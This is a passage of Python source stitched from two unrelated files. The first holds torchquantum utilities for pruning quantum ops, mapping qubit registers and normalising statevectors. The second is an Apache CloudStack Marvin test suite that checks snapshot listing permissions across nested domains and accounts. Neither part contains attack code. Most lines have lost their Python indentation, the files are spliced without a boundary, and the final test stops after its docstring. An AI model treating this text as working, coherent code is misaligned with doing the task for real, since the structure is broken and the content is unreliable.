ops = []
for info in op_list:
params = info['params']
if remove_ops:
if params is not None:
params = np.array(params) if isinstance(params, Iterable) \
else np.array([params])
params = params % (2 * np.pi)
params[params > np.pi] -= 2 * np.pi
if all(abs(params) < thres):
n_removed_ops += 1
continue
op = tq.op_name_dict[info['name']](
has_params=info['has_params'],
trainable=info['trainable'],
wires=info['wires'],
n_wires=info['n_wires'],
init_params=info['params'],
)
ops.append(op)
    if n_removed_ops > 0:
        logger.warning(f"Removed {n_removed_ops} pruned operations in total.")
    else:
        logger.info("No operations were removed.")
return tq.QuantumModuleFromOps(ops)
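# Hedged usage sketch (added for illustration): a hand-written op_list in the
# format produced by build_module_op_list above; 'rx' and 'cnot' are assumed
# to be valid keys of tq.op_name_dict.
def build_module_from_op_list_example():
    op_list = [
        {'name': 'rx', 'has_params': True, 'trainable': True,
         'wires': [0], 'n_wires': 1, 'params': [0.01]},
        {'name': 'cnot', 'has_params': False, 'trainable': False,
         'wires': [0, 1], 'n_wires': 2, 'params': None},
    ]
    return build_module_from_op_list(op_list)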
def build_module_description_test():
    from torchquantum.plugins import tq2qiskit
from examples.core.models.q_models import QFCModel12
q_model = QFCModel12({'n_blocks': 4})
desc = build_module_op_list(q_model.q_layer)
print(desc)
q_dev = tq.QuantumDevice(n_wires=4)
m = build_module_from_op_list(desc)
tq2qiskit(q_dev, m, draw=True)
desc = build_module_op_list(tq.RandomLayerAllTypes(
n_ops=200, wires=[0, 1, 2, 3], qiskit_compatible=True))
print(desc)
m1 = build_module_from_op_list(desc)
tq2qiskit(q_dev, m1, draw=True)
def get_p_v_reg_mapping(circ):
"""
p are physical qubits
v are logical qubits
"""
p2v_orig = circ._layout.get_physical_bits().copy()
mapping = {
'p2v': {},
'v2p': {},
}
for p, v in p2v_orig.items():
if v.register.name == 'q':
mapping['p2v'][p] = v.index
mapping['v2p'][v.index] = p
return mapping
def get_p_c_reg_mapping(circ):
"""
p are physical qubits
c are classical registers
"""
mapping = {
'p2c': {},
'c2p': {},
}
for gate in circ.data:
if gate[0].name == 'measure':
mapping['p2c'][gate[1][0].index] = gate[2][0].index
mapping['c2p'][gate[2][0].index] = gate[1][0].index
return mapping
def get_v_c_reg_mapping(circ):
"""
p are physical qubits, the real fabricated qubits
v are logical qubits, also the 'wires' in torchquantum lib
c are classical registers
want to get v2c
"""
p2v_orig = circ._layout.get_physical_bits().copy()
p2v = {}
for p, v in p2v_orig.items():
if v.register.name == 'q':
p2v[p] = v.index
mapping = {
'p2c': {},
'c2p': {},
}
for gate in circ.data:
if gate[0].name == 'measure':
mapping['p2c'][gate[1][0].index] = gate[2][0].index
mapping['c2p'][gate[2][0].index] = gate[1][0].index
mapping2 = {
'v2c': {},
'c2v': {}
}
for c, p in mapping['c2p'].items():
mapping2['c2v'][c] = p2v[p]
for c, v in mapping2['c2v'].items():
mapping2['v2c'][v] = c
return mapping2
def get_cared_configs(conf, mode) -> Config:
"""only preserve cared configs"""
conf = copy.deepcopy(conf)
ignores = ['callbacks',
'criterion',
'debug',
'legalization',
'regularization',
'verbose',
'get_n_params',
'prune',
]
if 'super' not in conf.trainer.name:
ignores.append('scheduler')
ignores.append('optimizer')
for ignore in ignores:
if hasattr(conf, ignore):
delattr(conf, ignore)
if hasattr(conf, 'dataset'):
dataset_ignores = ['binarize',
'binarize_threshold',
'center_crop',
'name',
'resize',
'resize_mode',
'root',
'train_valid_split_ratio',
]
for dataset_ignore in dataset_ignores:
if hasattr(conf.dataset, dataset_ignore):
delattr(conf.dataset, dataset_ignore)
if not mode == 'es' and hasattr(conf, 'es'):
delattr(conf, 'es')
elif mode == 'es' and hasattr(conf, 'es') and hasattr(conf.es, 'eval'):
delattr(conf.es, 'eval')
# if not mode == 'train' and hasattr(conf, 'trainer'):
# delattr(conf, 'trainer')
if hasattr(conf, 'qiskit'):
qiskit_ignores = [
'seed_simulator',
'seed_transpiler',
'coupling_map_name',
'basis_gates_name',
'est_success_rate',
]
for qiskit_ignore in qiskit_ignores:
if hasattr(conf.qiskit, qiskit_ignore):
delattr(conf.qiskit, qiskit_ignore)
if hasattr(conf, 'run'):
run_ignores = ['device',
'workers_per_gpu',
'n_epochs']
for run_ignore in run_ignores:
if hasattr(conf.run, run_ignore):
delattr(conf.run, run_ignore)
return conf
def get_success_rate(properties, transpiled_circ):
# estimate the success rate according to the error rates of single and
# two-qubit gates in transpiled circuits
gate_errors = gate_error_values(properties)
# construct the error dict
gate_error_dict = {}
for gate_error in gate_errors:
if gate_error[0] not in gate_error_dict.keys():
gate_error_dict[gate_error[0]] = {tuple(gate_error[1]):
gate_error[2]}
else:
gate_error_dict[gate_error[0]][tuple(gate_error[1])] = \
gate_error[2]
success_rate = 1
for gate in transpiled_circ.data:
gate_success_rate = 1 - gate_error_dict[gate[0].name][tuple(
map(lambda x: x.index, gate[1])
)]
success_rate *= gate_success_rate
return success_rate
def get_provider(backend_name, hub=None):
# mass-inst-tech-1 or MIT-1
if backend_name in ['ibmq_casablanca',
'ibmq_rome',
'ibmq_bogota']:
if hub == 'mass' or hub is None:
provider = IBMQ.get_provider(hub='ibm-q-research',
group='mass-inst-tech-1',
project='main')
elif hub == 'mit':
provider = IBMQ.get_provider(hub='ibm-q-research',
group='MIT-1',
project='main')
else:
raise ValueError(f"not supported backend {backend_name} in hub "
f"{hub}")
elif backend_name in ['ibmq_paris',
'ibmq_toronto',
'ibmq_manhattan',
'ibmq_guadalupe']:
provider = IBMQ.get_provider(hub='ibm-q-ornl',
group='anl',
project='csc428')
else:
if hub == 'mass' or hub is None:
try:
provider = IBMQ.get_provider(hub='ibm-q-research',
group='mass-inst-tech-1',
project='main')
except QiskitError:
logger.warning(f"Cannot use MIT backend, roll back to open")
provider = IBMQ.get_provider(hub='ibm-q')
elif hub == 'mit':
provider = IBMQ.get_provider(hub='ibm-q-research',
group='MIT-1',
project='main')
else:
provider = IBMQ.get_provider(hub='ibm-q')
return provider
def normalize_statevector(states):
    # make sure the squared magnitudes of the statevector sum to 1
    # states = states.contiguous()
original_shape = states.shape
states_reshape = states.reshape(states.shape[0], -1)
    # for states with zero norm, put all amplitude on the all-zero basis state
energy = (abs(states_reshape) ** 2).sum(dim=-1)
if energy.min() == 0:
for k, val in enumerate(energy):
if val == 0:
states_reshape[k][0] = 1
factors = torch.sqrt(1 / ((abs(states_reshape) ** 2).sum(
dim=-1))).unsqueeze(-1)
states = (states_reshape * factors).reshape(original_shape)
return states
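# Hedged usage sketch (added for illustration): the first state is rescaled to
# unit norm and the zero-norm state is replaced by the all-zero basis state,
# matching the zero-energy branch above.
def normalize_statevector_example():
    states = torch.tensor([[3.0, 4.0], [0.0, 0.0]])
    out = normalize_statevector(states)
    assert torch.allclose(out, torch.tensor([[0.6, 0.8], [1.0, 0.0]]))
    return out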
if __name__ == '__main__':
build_module_description_test()
switch_little_big_endian_matrix_test()
switch_little_big_endian_state_test()
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Test cases relating to listSnapshot() relating to parameters - id,listall,isrecursive,account and domainid
"""
# Import Local Modules
import marvin
from marvin.cloudstackTestCase import *
from marvin.cloudstackAPI import *
from marvin.lib.utils import *
from marvin.lib.base import *
from marvin.lib.common import *
from nose.plugins.attrib import attr
# Import System modules
import time
_multiprocess_shared_ = True
class TestSnapshotList(cloudstackTestCase):
@classmethod
def setUpClass(cls):
"""
Create the following domain tree and accounts that are reqiured for executing listSnapshot test cases:
Under ROOT - create 2 domaind D1 and D2
Under D1 - Create 2 subdomain D11 and D12
Under D11 - Create subdimain D111
Under each of the domain create 1 admin user and couple of regular users.
As each of these users , deploy Virtual machines and take a snapshot of the ROOT volume.
"""
cls.testclient = super(TestSnapshotList, cls).getClsTestClient()
cls.apiclient = cls.testclient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
cls.hypervisor = cls.testclient.getHypervisorInfo()
if cls.hypervisor.lower() == 'lxc':
raise unittest.SkipTest("snapshots are not supported on %s" % cls.hypervisor.lower())
cls.acldata = cls.testdata["acl"]
cls.domain_1 = None
cls.domain_2 = None
        cls.cleanup = []
try:
# backup default apikey and secretkey
cls.default_apikey = cls.apiclient.connection.apiKey
cls.default_secretkey = cls.apiclient.connection.securityKey
# Create domains
cls.domain_1 = Domain.create(
cls.apiclient,
cls.acldata["domain1"]
)
cls.domain_11 = Domain.create(
cls.apiclient,
cls.acldata["domain11"],
parentdomainid=cls.domain_1.id
)
cls.domain_111 = Domain.create(
cls.apiclient,
cls.acldata["domain111"],
parentdomainid=cls.domain_11.id,
)
cls.domain_12 = Domain.create(
cls.apiclient,
cls.acldata["domain12"],
parentdomainid=cls.domain_1.id
)
cls.domain_2 = Domain.create(
cls.apiclient,
cls.acldata["domain2"]
)
            # Create 1 admin account and 2 user accounts for domain_1
cls.account_d1 = Account.create(
cls.apiclient,
cls.acldata["accountD1"],
admin=True,
domainid=cls.domain_1.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d1)
cls.user_d1_apikey = user.apikey
cls.user_d1_secretkey = user.secretkey
cls.account_d1a = Account.create(
cls.apiclient,
cls.acldata["accountD1A"],
admin=False,
domainid=cls.domain_1.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d1a)
cls.user_d1a_apikey = user.apikey
cls.user_d1a_secretkey = user.secretkey
cls.account_d1b = Account.create(
cls.apiclient,
cls.acldata["accountD1B"],
admin=False,
domainid=cls.domain_1.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d1b)
cls.user_d1b_apikey = user.apikey
cls.user_d1b_secretkey = user.secretkey
            # Create 1 admin and 2 user accounts for domain_11
cls.account_d11 = Account.create(
cls.apiclient,
cls.acldata["accountD11"],
admin=True,
domainid=cls.domain_11.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d11)
cls.user_d11_apikey = user.apikey
cls.user_d11_secretkey = user.secretkey
cls.account_d11a = Account.create(
cls.apiclient,
cls.acldata["accountD11A"],
admin=False,
domainid=cls.domain_11.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d11a)
cls.user_d11a_apikey = user.apikey
cls.user_d11a_secretkey = user.secretkey
cls.account_d11b = Account.create(
cls.apiclient,
cls.acldata["accountD11B"],
admin=False,
domainid=cls.domain_11.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d11b)
cls.user_d11b_apikey = user.apikey
cls.user_d11b_secretkey = user.secretkey
            # Create 1 user account for domain_111
cls.account_d111a = Account.create(
cls.apiclient,
cls.acldata["accountD111A"],
admin=False,
domainid=cls.domain_111.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d111a)
cls.user_d111a_apikey = user.apikey
cls.user_d111a_secretkey = user.secretkey
            # Create 2 user accounts for domain_12
cls.account_d12a = Account.create(
cls.apiclient,
cls.acldata["accountD12A"],
admin=False,
domainid=cls.domain_12.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d12a)
cls.user_d12a_apikey = user.apikey
cls.user_d12a_secretkey = user.secretkey
cls.account_d12b = Account.create(
cls.apiclient,
cls.acldata["accountD12B"],
admin=False,
domainid=cls.domain_12.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d12b)
cls.user_d12b_apikey = user.apikey
cls.user_d12b_secretkey = user.secretkey
# Create 1 user account for domain_2
cls.account_d2a = Account.create(
cls.apiclient,
cls.acldata["accountD2"],
admin=False,
domainid=cls.domain_2.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d2a)
cls.user_d2a_apikey = user.apikey
cls.user_d2a_secretkey = user.secretkey
# Create admin user account
cls.account_a = Account.create(
cls.apiclient,
cls.acldata["accountROOTA"],
admin=True,
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_a)
cls.user_a_apikey = user.apikey
cls.user_a_secretkey = user.secretkey
# create service offering
cls.service_offering = ServiceOffering.create(
cls.apiclient,
cls.acldata["service_offering"]["small"]
)
cls.zone = get_zone(cls.apiclient, cls.testclient.getZoneForTests())
cls.acldata['mode'] = cls.zone.networktype
cls.template = get_template(cls.apiclient, cls.zone.id, cls.acldata["ostype"])
# deploy VM
cls.apiclient.connection.apiKey = cls.user_d1_apikey
cls.apiclient.connection.securityKey = cls.user_d1_secretkey
cls.vm_d1 = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD1"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d1_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d1.id)
cls.vm_d1_snapshot = Snapshot.create(cls.apiclient, cls.vm_d1_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d1a_apikey
cls.apiclient.connection.securityKey = cls.user_d1a_secretkey
cls.vm_d1a = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD1A"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d1a_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d1a.id)
cls.vm_d1a_snapshot = Snapshot.create(cls.apiclient, cls.vm_d1a_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d1b_apikey
cls.apiclient.connection.securityKey = cls.user_d1b_secretkey
cls.vm_d1b = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD1B"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d1b_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d1b.id)
cls.vm_d1b_snapshot = Snapshot.create(cls.apiclient, cls.vm_d1b_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d11_apikey
cls.apiclient.connection.securityKey = cls.user_d11_secretkey
cls.vm_d11 = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD11"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d11_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d11.id)
cls.vm_d11_snapshot = Snapshot.create(cls.apiclient, cls.vm_d11_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d11a_apikey
cls.apiclient.connection.securityKey = cls.user_d11a_secretkey
cls.vm_d11a = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD11A"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d11a_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d11a.id)
cls.vm_d11a_snapshot = Snapshot.create(cls.apiclient, cls.vm_d11a_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d11b_apikey
cls.apiclient.connection.securityKey = cls.user_d11b_secretkey
cls.vm_d11b = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD11B"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d11b_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d11b.id)
cls.vm_d11b_snapshot = Snapshot.create(cls.apiclient, cls.vm_d11b_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d111a_apikey
cls.apiclient.connection.securityKey = cls.user_d111a_secretkey
cls.vm_d111a = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD111A"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d111a_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d111a.id)
cls.vm_d111a_snapshot = Snapshot.create(cls.apiclient, cls.vm_d111a_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d12a_apikey
cls.apiclient.connection.securityKey = cls.user_d12a_secretkey
cls.vm_d12a = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD12A"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d12a_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d12a.id)
cls.vm_d12a_snapshot = Snapshot.create(cls.apiclient, cls.vm_d12a_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d12b_apikey
cls.apiclient.connection.securityKey = cls.user_d12b_secretkey
cls.vm_d12b = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD12B"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d12b_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d12b.id)
cls.vm_d12b_snapshot = Snapshot.create(cls.apiclient, cls.vm_d12b_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d2a_apikey
cls.apiclient.connection.securityKey = cls.user_d2a_secretkey
cls.vm_d2 = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD2A"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d2_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d2.id)
cls.vm_d2_snapshot = Snapshot.create(cls.apiclient, cls.vm_d2_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_a_apikey
cls.apiclient.connection.securityKey = cls.user_a_secretkey
cls.vm_a = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmROOTA"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_a_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_a.id)
cls.vm_a_snapshot = Snapshot.create(cls.apiclient, cls.vm_a_volume[0].id)
cls.cleanup = [
cls.account_a,
cls.service_offering,
]
        except Exception as e:
            if cls.domain_2 is not None:
                cls.domain_2.delete(cls.apiclient, cleanup="true")
            if cls.domain_1 is not None:
                cls.domain_1.delete(cls.apiclient, cleanup="true")
            cleanup_resources(cls.apiclient, cls.cleanup)
            raise Exception("Failed to create the setup required to execute the test cases: %s" % e)
@classmethod
def tearDownClass(cls):
cls.apiclient = super(TestSnapshotList, cls).getClsTestClient().getApiClient()
cls.apiclient.connection.apiKey = cls.default_apikey
cls.apiclient.connection.securityKey = cls.default_secretkey
try:
cls.domain_2.delete(cls.apiclient, cleanup="true")
cls.domain_1.delete(cls.apiclient, cleanup="true")
except:
pass
cleanup_resources(cls.apiclient, cls.cleanup)
    def setUp(self):
        self.apiclient = self.testClient.getApiClient()
        self.dbclient = self.testClient.getDbConnection()
    def tearDown(self):
        # restore the default apikey and secretkey
        self.apiclient.connection.apiKey = self.default_apikey
        self.apiclient.connection.securityKey = self.default_secretkey
        return
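    # Expected snapshot counts used by the assertions below (one snapshot per
    # account created in setUpClass): 9 under the D1 tree, 3 directly in D11,
    # 4 in D11 plus its subdomain D111, and at least 11 in total across ROOT,
    # the D1 tree and D2.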
    ## Domain Admin - Test cases with listall=true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_listall_true(self):
"""
Test listing of Snapshots by passing listall="true" parameter as domain admin
        Validate that it returns all the Snapshots owned by accounts in this domain and all its subdomains
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true")
self.debug("List as Domain Admin - listall=true - %s" % snapshotList)
self.assertEqual(len(snapshotList) == 9,
True,
"Number of items in list response check failed!!")
        if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_listall_true_rec_true(self):
"""
Test listing of Snapshots by passing listall="true"i and isrecusriv="true" parameter as domain admin
Validate that it returns all the Snapshots that is owned by accounts in this domain and all its subdomain
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true", isrecursive="true")
self.debug("List as Domain Admin - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 9,
True,
"Number of items in list response check failed!!")
        if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_listall_true_rec_false(self):
"""
Test listing of Snapshots by passing listall="true" and isrecusriv="false" parameter as domain admin
Validate that it returns all the Snapshots that is owned by accounts in this domain and all its subdomain
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true", isrecursive="false")
self.debug("List as Domain Admin - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 9,
True,
"Number of items in list response check failed!!")
        if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Domain Admin - Test cases with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_listall_false(self):
"""
Test listing of Snapshots by passing listall="false" parameter as domain admin
        Validate that it returns all the Snapshots owned by the domain admin
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false")
self.debug("List as Domain Admin - listall=false - %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_listall_false_rec_true(self):
"""
Test listing of Snapshots by passing listall="false" and isrecusrive="true" parameter as domain admin
Validate that it returns all the Snapshots that is owned by the domain admin
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false", isrecursive="true")
self.debug("List as Domain Admin - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_listall_false_rec_false(self):
"""
Test listing of Snapshots by passing listall="false" and isrecusrive="false" parameter as domain admin
Validate that it returns all the Snapshots that is owned by the domain admin
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false", isrecursive="false")
self.debug("List as Domain Admin - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## Domain Admin - Test cases without passing the listall parameter
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin(self):
"""
Test listing of Snapshots by passing no parameter as domain admin
        Validate that it returns all the Snapshots owned by the domain admin
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient)
self.debug("List as Domain Admin - %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_rec_true(self):
"""
Test listing of Snapshots by passing isrecusrive="true" parameter as domain admin
Validate that it returns all the Snapshots that is owned by the domain admin
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, isrecursive="true")
self.debug("List as Domain Admin - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_true_rec_false(self):
"""
Test listing of Snapshots by passing isrecusrive="false" parameter as domain admin
Validate that it returns all the Snapshots that is owned by the domain admin
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, isrecursive="false")
self.debug("List as Domain Admin - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## Domain Admin - Test cases when domainId is passed with listall=true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_listall_true(self):
"""
Test listing of Snapshots by passing domainId and listall="true" parameter as domain admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="true")
self.debug("List as Domain Admin passing domainId - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_listall_true_rec_true(self):
"""
Test listing of Snapshots by passing domainId ,listall="true" and isrecursive="true" parameter as domain admin
Validate that it returns all the Snapshots in the subdomain and the domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="true", isrecursive="true")
self.debug("List as Domain Admin passing domainId - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 4,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_listall_true_rec_false(self):
"""
Test listing of Snapshots by passing domainId ,listall="true" and isrecursive="false" parameter as domain admin
Validate that it returns all the Snapshots in the domain passed
"""
